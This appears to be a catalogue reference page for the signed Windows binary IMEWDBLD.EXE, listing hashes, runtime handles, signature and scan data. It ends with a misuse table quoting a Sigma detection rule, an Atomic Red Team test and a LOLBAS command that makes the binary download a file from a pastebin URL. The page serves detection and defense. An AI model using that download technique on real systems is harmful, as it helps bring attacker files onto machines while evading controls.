IMEWDBLD.EXE

  • File Path: C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 40FBB367D0F83472C170359D6E3446A0
SHA1 C274597DAB07491C3CA8D9863383145771E4EDBB
SHA256 0CFF477B20735E3E56EB8FB1866108362F3FED20E230F07BBC21F8C2D8E13C96
SHA384 030423B6426729A7BE096632F6CF46D4DBA4A8A57E45A8143ADD7380C9C932D6D926F52BE3EC1CB83928AC067A911059
SHA512 E53E7F2379B75755D4617AB13D2DBC60D705D11689763FC0335AB61A3E61330A86488705F4C2B92F2CB1264334243BD8A27027B3240AE477D4327A83129C939D
SSDEEP 6144:vBNjNNnj4mDYaW1rxK4Op4mBNqvcGSvSOkBvGemmq8V7Gs/UEVTppcX+LRe:vBNhNn0881rxK4Op4mB2cGuSOE1V7Gs2
IMP 589AC1368274910A75F86CA227986543
PESHA1 4A1200710DB7A3F462188687A543D4334AFE78CF
PE256 24569DB8E668615F79A19AA6C57282AD259D721EA26E4AD3DF6F88C235D69FD7

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/74
  • VirusTotal Link: https://www.virustotal.com/gui/file/0cff477b20735e3e56eb8fb1866108362f3fed20e230f07bbc21f8c2d8e13c96/detection

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 33
C:\Windows\system32\IME\shared\IMEWDBLD.EXE 32
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 36
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 35
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 33
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 38

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.